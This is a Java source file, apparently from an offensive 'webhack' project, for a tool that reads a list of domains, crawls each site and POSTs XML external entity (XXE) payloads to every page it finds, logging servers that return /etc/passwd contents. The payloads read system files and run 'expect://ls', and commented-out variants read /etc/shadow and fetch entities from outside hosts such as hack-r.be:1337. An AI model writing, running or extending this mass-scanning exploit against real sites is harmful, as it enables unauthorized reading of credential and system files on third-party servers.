package webhack.xxe;

import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.select.Elements;
import org.jsoup.nodes.Element;

import java.io.*;
import java.net.HttpURLConnection;
import java.net.URI;
import java.net.URL;
import java.util.*;

public class LiteXXE implements Runnable {

    private Set<String> visitedLinks = new HashSet<>();
    private int stet = 0;

    private String baseDomain;
    public void parse(String url, String log, int maxdomen) {
        int stet_url = 0;
        baseDomain = getBaseDomain(url);
        Queue<String> queue = new LinkedList<>();
        queue.add(url);

        while (!queue.isEmpty()) {
            String currentUrl = queue.poll();

            try {
                if (visitedLinks.contains(currentUrl)) {
                    continue;
                }

                visitedLinks.add(currentUrl);
                Document document = Jsoup.connect(currentUrl).get();

                Elements links = document.select("a[href]");
                for (Element link : links) {
                    String absUrl = link.absUrl("href");
                    // Проверяем, что ссылка ведет на тот же домен и что мы еще не посещали эту ссылку
                    if (isSameDomain(absUrl) && !visitedLinks.contains(absUrl)) {
                        queue.add(absUrl);
                        stet_url++;
                        if (maxdomen != 0) {
                            if (stet_url == maxdomen) {
                                break;
                            }
                        }
                    }
                }

                System.out.println("---------------------------");
                if (maxdomen != 0) {
                    if (stet_url <= maxdomen) {
                        checkForXXE(currentUrl, log); 
                    } else {
                        break;
                    }
                } else {
                    checkForXXE(currentUrl, log);
                }
                System.out.println("---------------------------");
            } catch (Exception e) {
                System.out.println(";( Error - " + e);
            }
        }
    }
    private String getBaseDomain(String url) {
        try {
            URI uri = new URI(url);
            return uri.getScheme() + "://" + uri.getHost();
        } catch (Exception e) {
            return "";
        }
    }
    private boolean isSameDomain(String url) {
        return url.startsWith(baseDomain);
    }


    private void checkForXXE(String urlString, String log) {
        HttpURLConnection connection = null;
        BufferedReader reader = null;

        BufferedWriter writer = null;
        try {
            writer = new BufferedWriter(new FileWriter(log, true));
        } catch (IOException e) {
            System.out.println(";( Error  -" + e);
        }

        // Пример XML с XXE инъекцией
        ArrayList<String> masxxePayload = new ArrayList<>();
        masxxePayload.add("<?xml version=\"1.0\"?>\n" +
                "<!DOCTYPE foo [\n" +
                "  <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n" +
                "]>\n" +
                "<foo>&xxe;</foo>");
        masxxePayload.add("<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" width=\"300\" version=\"1.1\" height=\"200\">\n" +
                "    <image xlink:href=\"expect://ls\"></image>\n" +
                "</svg>");
        masxxePayload.add("<!DOCTYPE test [ <!ENTITY % init SYSTEM \"data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk\"> %init; ]><foo/>");

        try {
            for(String xmlPayload : masxxePayload) {
                URL url = new URL(urlString);
                connection = (HttpURLConnection) url.openConnection();
                connection.setConnectTimeout(5000); // Тайм-аут на подключение 5 секунд
                connection.setReadTimeout(5000); // Тайм-аут на чтение 5 секунд
                connection.setRequestMethod("POST");
                connection.setDoOutput(true);
                connection.setRequestProperty("Content-Type", "application/xml");

                connection.getOutputStream().write(xmlPayload.getBytes());

                reader = new BufferedReader(new InputStreamReader(connection.getInputStream()));
                StringBuilder response = new StringBuilder();
                String line;

                while ((line = reader.readLine()) != null) {
                    response.append(line);
                }

                if (response.toString().contains("root:")) {
                    System.out.println("($_$>) XXE Vulnerability found on: " + urlString + " | and payload: " + xmlPayload);
                    if (!log.equals("n") && !log.equals("N")) {
                        writer.write("($_$>) XXE Vulnerability found on: " + urlString + " | and payload: " + xmlPayload + "\n");
                    }
                } else {
                    System.out.println(";( Error XXE No found on: " + urlString);
                }
            }
        } catch (IOException e) {
            System.out.println(";( Error - " + e);
        } finally {
            if (reader != null) {
                try {
                    reader.close();
                } catch (IOException e) {
                    System.out.println(";( Error - " + e);
                }
            }
            if (connection != null) {
                connection.disconnect();
            }
        }
    }

    public LiteXXE(String bd, String log, int maxdomen) {
        BufferedReader br = null;
        try {
            ArrayList<String> masWebsiteUrl = new ArrayList<>();
            br = new BufferedReader(new FileReader(bd));
            String l;
            while ((l = br.readLine()) != null) {
                masWebsiteUrl.add("http://" + l);
            }

            for (String websiteUrl : masWebsiteUrl) {
                parse(websiteUrl, log, maxdomen);
            }
            System.out.println("Количество найденных XXE: " + stet);
        } catch (Exception e) {
            System.out.println(";( Error - " + e);
        } finally {
            try {
                if (br != null) br.close();
            } catch (IOException e) {
                System.out.println(";( Error - " + e);
            }
        }
    }

//-----------------------------------------------------------------

    public LiteXXE() {}

    private String bd1;
    private String log1;
    private int maxdomen1;
    public void setBd1(String bd1) {this.bd1 = bd1;}
    public void setLog1(String log1) {this.log1 = log1;}
    public void setMmaxdomen1(int maxdomen1) {this.maxdomen1 = maxdomen1;}

    public void threadRun() {
        BufferedReader br = null;
        try {
            ArrayList<String> masWebsiteUrl = new ArrayList<>();
            br = new BufferedReader(new FileReader(bd1));
            String l;
            while ((l = br.readLine()) != null) {
                masWebsiteUrl.add("http://" + l);
            }

            for (String websiteUrl : masWebsiteUrl) {
                parse(websiteUrl, log1, maxdomen1);
            }
            System.out.println("Количество найденных XXE: " + stet);
        } catch (Exception e) {
            System.out.println(";( Error - " + e);
        } finally {
            try {
                if (br != null) br.close();
            } catch (IOException e) {
                System.out.println(";( Error - " + e);
            }
        }
    }

    @Override
    public void run() {
        threadRun();
    }

//-----------------------------------------------------------------


    /*
    public void parse(String url, String log) { // старая проверка по всем подддоменам даже на сторонние ресурсы
        Queue<String> queue = new LinkedList<>();
        queue.add(url);

        while (!queue.isEmpty()) {
            String currentUrl = queue.poll();

            try {
                // Проверяем, посещали ли мы эту ссылку ранее
                if (visitedLinks.contains(currentUrl)) {
                    continue;
                }

                // Добавляем текущий URL в список посещенных
                visitedLinks.add(currentUrl);
                Document document = Jsoup.connect(currentUrl).get();

                // Сбор всех ссылок на страницы
                Elements links = document.select("a[href]");
                for (Element link : links) {
                    String absUrl = link.absUrl("href");
                    // Проверяем, что ссылка ведет на тот же домен и что мы еще не посещали эту ссылку
                    if ((absUrl.startsWith(url) || absUrl.startsWith("http")) && !visitedLinks.contains(absUrl)) {
                        queue.add(absUrl);
                    }
                }

                System.out.println("---------------------------");
                checkForXXE(currentUrl, log); // Ваша функция проверки
                System.out.println("---------------------------");
            } catch (Exception e) {
                System.out.println(";( Error - " + e);
            }
        }
    }
     */

    /*
    masxxePayload.add("<?xml version=\"1.0\" encoding=\"UTF-7\"?>\n" +
                "+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4\n" +
                "+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+\n" +
                "+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4");
        masxxePayload.add("<!--?xml version=\"1.0\" ?-->\n" +
                "<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/shadow\"> ]>\n" +
                "<userInfo>\n" +
                " <firstName>John</firstName>\n" +
                " <lastName>&ent;</lastName>\n" +
                "</userInfo>");
        masxxePayload.add("<?xml version=\"1.0\"?>\n" +
                "<!DOCTYPE foo [  \n" +
                "<!ELEMENT foo (#ANY)>\n" +
                "<!ENTITY xxe SYSTEM \"https://"+urlString+"/text.txt\">]><foo>&xxe;</foo>");
        masxxePayload.add("<?xml version=\"1.0\"?>\n" +
                "<!DOCTYPE lolz [\n" +
                "<!ENTITY test SYSTEM \"https://"+urlString+"/entity1.xml\">]>\n" +
                "<lolz><lol>3..2..1...&test<lol></lolz>");
        masxxePayload.add("<soap:Body>\n" +
                "  <foo>\n" +
                "    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM \"http://x.x.x.x:22/\"> %dtd;]><xxx/>]]>\n" +
                "  </foo>\n" +
                "</soap:Body>");
     */
}